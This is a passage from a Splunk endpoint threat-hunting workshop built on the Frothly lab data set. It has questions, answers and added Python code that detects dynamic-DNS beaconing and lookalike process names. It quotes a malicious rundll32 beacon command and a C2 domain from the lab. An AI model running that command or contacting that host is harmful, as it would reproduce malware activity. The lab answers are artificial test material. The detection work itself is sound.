• Isolate on events on the suspicious hosts
• Type - ingress.event.procstart

Question #5
Identify Binary Characteristics

What unique characteristic does one of those Image values have that would validate that
the adversary has been on the Frothly network in the past?

rundll32.exe c:\windows\odbc64.dll, init is running every four seconds on PCERF-L

Is odbc64.dll a standard Windows file?

Whether it is or isn’t, would you expect something like that to run at that frequency?

Could this be an indication of beaconing?


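The whole hunt, from Sysmon Event 22 through the dynamic DNS lookup to the Carbon Black process starts, as an added Python example (not the deck's SPL, Splunk's or Carbon Black's code). registered_domain is a minimal stand-in for URL Toolbox's ut_parse_extended with an assumed suffix set instead of the IANA list, DYNAMIC_DNS is a constructed stand-in for dynamic-dns.csv, and the Sysmon and procstart records are constructed with the field names the questions use (Image, QueryName, host; type, hostname, command_line, timestamp). The last function generalises Q5: instead of eyeballing the four-second cadence, it measures how regular the inter-arrival gaps are.

```python
from statistics import median, pstdev
from collections import Counter

# Assumed suffix set; the real command uses the IANA/public suffix list.
SUFFIXES = {"com", "org", "net", "co.uk"}

# Constructed stand-in for the dynamic-dns.csv lookup.
DYNAMIC_DNS = {"servebeer.com", "ddns.net", "hopto.org", "duckdns.org"}

RUNDLL = "C:\\Windows\\System32\\rundll32.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"

# Constructed Sysmon Event 22 records with the fields Splunk extracts.
SAMPLE_SYSMON = [
    {"EventCode": 22, "host": "PCERF-L", "Image": RUNDLL, "QueryName": "frenchconnection.servebeer.com"},
    {"EventCode": 22, "host": "PCERF-L", "Image": RUNDLL, "QueryName": "frenchconnection.servebeer.com"},
    {"EventCode": 22, "host": "PCERF-L", "Image": RUNDLL, "QueryName": "FrenchConnection.servebeer.com."},
    {"EventCode": 22, "host": "AGRADY-L", "Image": CHROME, "QueryName": "www.brewersassociation.org"},
    {"EventCode": 22, "host": "FYODOR-L", "Image": CHROME, "QueryName": "www.example.co.uk"},
    {"EventCode": 22, "host": "HOTH", "Image": "/usr/bin/curl", "QueryName": "update.hopto.org"},  # not a laptop
    {"EventCode": 1, "host": "PCERF-L", "Image": RUNDLL, "QueryName": ""},  # wrong event code
]

# Constructed Carbon Black ingress.event.procstart records; BASE is
# 2019-08-01 04:00:00 UTC, inside the hunt's window.
BASE = 1564632000
SAMPLE_CB = (
    [{"type": "ingress.event.procstart", "hostname": "PCERF-L", "timestamp": BASE + 4 * i,
      "command_line": "rundll32.exe c:\\windows\\odbc64.dll, init"} for i in range(6)]
    + [{"type": "ingress.event.procstart", "hostname": "PCERF-L", "timestamp": BASE + t,
        "command_line": "explorer.exe"} for t in (0, 37, 900, 1301, 1302, 2400)]
)


def registered_domain(qname):
    """Registered domain (ut_domain) of a query name, None without a known suffix."""
    labels = qname.lower().rstrip(".").split(".")
    for n in (2, 1):  # longest suffix first, so co.uk beats uk
        if len(labels) > n and ".".join(labels[-n:]) in SUFFIXES:
            return ".".join(labels[-n - 1:])
    return None


def ddns_queries(events):
    """Q1-Q3: laptop DNS queries whose registered domain is a dynamic DNS provider."""
    hits = set()
    for ev in events:
        if ev["EventCode"] != 22 or not ev["host"].endswith("-L"):
            continue
        dom = registered_domain(ev["QueryName"])
        if dom in DYNAMIC_DNS:
            hits.add((ev["host"], ev["Image"], ev["QueryName"].lower().rstrip("."), dom))
    return sorted(hits)


def binaries_for_query(events, qname):
    """Q4: (host, Image) counts behind one suspicious QueryName."""
    want = qname.lower().rstrip(".")
    return Counter((ev["host"], ev["Image"]) for ev in events
                   if ev["EventCode"] == 22 and ev["QueryName"].lower().rstrip(".") == want)


def procstart_times(cb_events, host, needle):
    """Sorted start times of procstart events on a host matching a command substring."""
    return sorted(ev["timestamp"] for ev in cb_events
                  if ev["type"] == "ingress.event.procstart" and ev["hostname"] == host
                  and needle.lower() in ev["command_line"].lower())


def beacon_stats(times, min_starts=5, max_jitter=1.0):
    """Q5: regular inter-arrival gaps are the beaconing signal.
    Returns (starts, median gap in seconds, std dev of gaps, verdict)."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < min_starts - 1:
        return (len(times), None, None, False)
    med, dev = median(gaps), pstdev(gaps)
    return (len(times), med, dev, dev <= max_jitter)


if __name__ == "__main__":
    print(ddns_queries(SAMPLE_SYSMON))
    print(binaries_for_query(SAMPLE_SYSMON, "frenchconnection.servebeer.com"))
    print(beacon_stats(procstart_times(SAMPLE_CB, "PCERF-L", "odbc64.dll")))
    print(beacon_stats(procstart_times(SAMPLE_CB, "PCERF-L", "explorer.exe")))
```

Normalising case and the trailing dot before comparing query names is deliberate: Sysmon records whatever the resolver was asked, and a lookup that keys on the raw string will miss the mixed-case and fully-qualified variants of the same domain.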

Common Information
Model / Data Models

Common Information Model

Splunk did not invent CIM

Method to take disparate data sets and provide a common taxonomy to ask questions of the data

Implementation of CIM is via Data Models

Data Models are available for use in Splunk Enterprise
• https://splunkbase.splunk.com/app/1621/

Heavily used in Enterprise Security

Documentation: http://docs.splunk.com/Documentation/CIM/latest/User/Overview

See also: https://conf.splunk.com/files/2017/slides/the-power-of-data-normalization-a-look-at-cim-under-the-hood.pdf

Endpoint Data Model

Takes the best of Application State and Change Analysis and puts them in one model

FIVE base searches: Ports, Processes, Registry, Services, Filesystem
• Endpoint.Processes is the workhorse

Dashboards in ES use these models

Change Analysis and Application State remain, but are deprecated and not accelerated by default

Other Data Models You Will Use To Monitor Your Endpoints

Authentication - Describes login activities

Change - Describe audit, endpoint, network and accounts and their associated create, read, update,
and delete activities

Event Signatures – New to CIM 4.15 and stores Windows EventID and associated hosts

Intrusion Detection - Describe Attack Detections

Malware - Describes malware detection and endpoint protection management

Network Traffic - Describes flows of data across network infrastructure (sysmon/3)

Updates - Describes patch management events from individual systems or central management tools

Web - Describes web server and/or proxy server data in a security or operational context

Endpoint Content:
Enterprise Security Content Updates
Splunk Security Essentials

Splunk Security Essentials (SSE): Ideas to Leverage Endpoint Content

Enterprise Security Content Update (ESCU)



Get these on Splunkbase!

If you search "ESCU" in Splunkbase, the first two hits are ESCU and SSE.

Hands-On:
ESCU and SSE

Question #1
Splunk Security Essentials

As we review our endpoint data, do we have any executables running that might be
masquerading as legitimate executables but are using a similar, but slightly different name
to evade suspicion?

Hints
• Use Splunk Security Essentials
• lookalike is a good word to search for
(Screenshot walkthrough, summarized: in Splunk Security Essentials, type "lookalike" in the content search and open the matching detection; click through each stage of the content page; review the MITRE ATT&CK, Kill Chain and Data Sources tags and expand the Contextual Information; then run the search with the time range set between 8/19/2018 and 8/21/2018.)

Question #1
Security Essentials

As we look at our endpoint data, do we have any executables running that might be
masquerading as legitimate executables but are using a similar, but slightly different name
to evade suspicion?

Two outlier files that bear additional investigation: sihost.exe and iexeplorer.exe
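What SSE's lookalike content is doing, reduced to its essentials as an added Python example (not SSE's search or the deck's code): an edit-distance comparison of each executable name against a list of binaries that lookalikes imitate, combined with the frequency grouping from the FYODOR-L question earlier (Sysmon Event Code 1, rare process names). KNOWN_GOOD is an assumed list, and the Sysmon Event 1 records are constructed; iexeplorer.exe mirrors the answer above, scvhost.exe is added to show the check generalises beyond one name.

```python
import ntpath
from collections import Counter

# Binaries a lookalike is most often modelled on; assumed list for the example.
KNOWN_GOOD = {"iexplore.exe", "explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe",
              "services.exe", "winlogon.exe", "rundll32.exe", "powershell.exe", "cmd.exe"}

# Constructed Sysmon Event 1 records as (host, Image).
SAMPLE_EVENTS = (
    [("FYODOR-L", "C:\\Windows\\System32\\svchost.exe")] * 40
    + [("AGRADY-L", "C:\\Windows\\System32\\svchost.exe")] * 35
    + [("FYODOR-L", "C:\\Program Files\\Internet Explorer\\iexplore.exe")] * 6
    + [("FYODOR-L", "C:\\Windows\\System32\\cmd.exe")] * 9
    + [("FYODOR-L", "C:\\windows\\temp\\unziped\\lsof-master\\iexeplorer.exe")]
    + [("AGRADY-L", "C:\\Users\\Public\\scvhost.exe")] * 2
)


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute), classic two-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _prefix_len(a, b):
    """Length of the common prefix; lookalikes usually keep the start of a name."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def process_counts(events):
    """The Q3 hint: group by executable name and see what is rare."""
    return Counter(ntpath.basename(image).lower() for _, image in events)


def lookalikes(names, known=KNOWN_GOOD, max_distance=2):
    """Names not in `known` that sit within max_distance edits of one that is.
    Ties are broken by longest common prefix, then alphabetically."""
    out = {}
    for name in names:
        if name in known:
            continue
        best = min(sorted(known),
                   key=lambda k: (levenshtein(name, k), -_prefix_len(name, k)))
        d = levenshtein(name, best)
        if d <= max_distance:
            out[name] = (best, d)
    return out


def suspects(events, rare_below=3):
    """Lookalikes that are also rare in the data set, with the hosts they ran on."""
    counts = process_counts(events)
    hits = lookalikes(counts)
    result = {}
    for name, (model, dist) in hits.items():
        if counts[name] >= rare_below:
            continue
        hosts = sorted({h for h, img in events if ntpath.basename(img).lower() == name})
        result[name] = {"looks_like": model, "distance": dist,
                        "count": counts[name], "hosts": hosts}
    return result


if __name__ == "__main__":
    for name, info in suspects(SAMPLE_EVENTS).items():
        print(name, info)
```

The known-good list has to contain every legitimate binary that runs in your environment, or the heuristic will flag real names that happen to sit two edits from each other; rarity is what keeps the output short, and a lookalike that is suddenly common is a different and worse problem.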

Question #2
Enterprise Security Content Update

Remote desktop should only be run on certain systems within our environment. Find the
lateral movement analytic story and review the detection searches and find the detection
search that best meets our requirement and determine which systems are running
Remote Desktop.

Hints
• Use Enterprise Security Content Update

Question #2
Enterprise Security Content Update

Remote desktop should only be run on certain systems within our environment. Find the
lateral movement analytic story and review the detection searches and find the detection
search that best meets our requirement and determine which systems and users are
running Remote Desktop.

Detection Search: ESCU - Remote Desktop Process Running on System

Destination: AGRADY-L

User: frothly_helpdesk

Conclusion

Wrapping Up

Endpoint data provides crucial insight

Opportunities exist no matter the OS

Filtering and configuration are key to good visibility

SSE and ESCU provide good content to start with and customize to your needs

| eval EventCode = case(WindowsLogData="WindowsSecurity", "4688", WindowsLogData="Sysmon", "1")

In other words: if your Windows data is the Security log, start with process creation (4688); if it is Sysmon, start with Event Code 1.

Splunk Resources to Check Out

Windows Event Code Security Analysis App (Github)
• https://github.com/stressboi/splunk_wineventcode_secanalysis

Splunking the Endpoint
• https://conf.splunk.com/session/2015/conf2015_Jbrodsky_Splunk_SecurityComplinace_SplunkingTheEndpoint_FINAL.pdf

Splunking the Endpoint: Hands On!
• https://conf.splunk.com/files/2016/slides/splunking-the-endpoint-hands-on.pdf

Splunking the Endpoint Part III: Hands-On with BOTS Data!
• https://conf.splunk.com/files/2017/slides/splunking-the-endpoint-part-iii-hands-on-with-bots-data.pdf

Hunting with Splunk (Blog series)
• https://www.splunk.com/blog/2017/07/06/hunting-with-splunk-the-basics.html

Non-Splunk Resources to Check Out

Michael Gough – Malware Archaeology Cheat Sheets
• https://www.malwarearchaeology.com/cheat-sheets

NSA
• https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Andrea Fortuna
• https://www.andreafortuna.org/2019/06/12/windows-security-event-logs-my-own-cheatsheet/

ASD
• https://www.cyber.gov.au/publications/windows-event-logging-and-forwarding

JP-CERT
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf

Data Sets to Practice Against

If you would like to get the data sets and explore further, now you can!

BOTS version 1 data set
• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-scoring-server-questions-and-answers-and-dataset-open-sourced-and-ready-for-download.html
• Data Set: https://github.com/splunk/botsv1
• Companion investigating app: https://splunkbase.splunk.com/app/3985/

BOTS version 2 data set
• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-2-0-dataset-questions-and-answers-open-sourced-and-ready-for-download.html
• Data Set: https://events.splunk.com/BOTS_2_0_datasets
• Companion Advanced APT Hunting app: https://splunkbase.splunk.com/app/4430/
• Blog: https://www.splunk.com/en_us/blog/security/boss-of-the-soc-bots-advanced-apt-hunting-companion-app-now-available-on-splunkbase.html

BOTS version 3 data set
• Blog: https://www.splunk.com/en_us/blog/security/botsv3-dataset-released.html
• Data Set: https://github.com/splunk/botsv3

Splunk for Security Workshops

(Grid of workshops, arranged from Introductory to Advanced across Splunk Enterprise/Cloud, Enterprise Security, Phantom and UBA:)
• Enterprise Security Hands-On (ESHO)
• UBA Hands-On
• AWS Hands-On
• AWS 2: Attack in the Cloud
• Monitoring K8s
• Building Correlation Searches
• Insider Threat Hands-On
• Phantom Hands-On
• Splunking the Endpoint
• Splunking for Fraud
• Advanced APT Hunting
• GCP in Splunk
• Security Lunch n' Learn
• Security Operations Suite Hands-On
• Hunting in the MS Cloud
• Investigating with Splunk
• Boss of the SOC

How Did We Do?

PonyPoll: https://ponypoll.com/securityws

Thank You
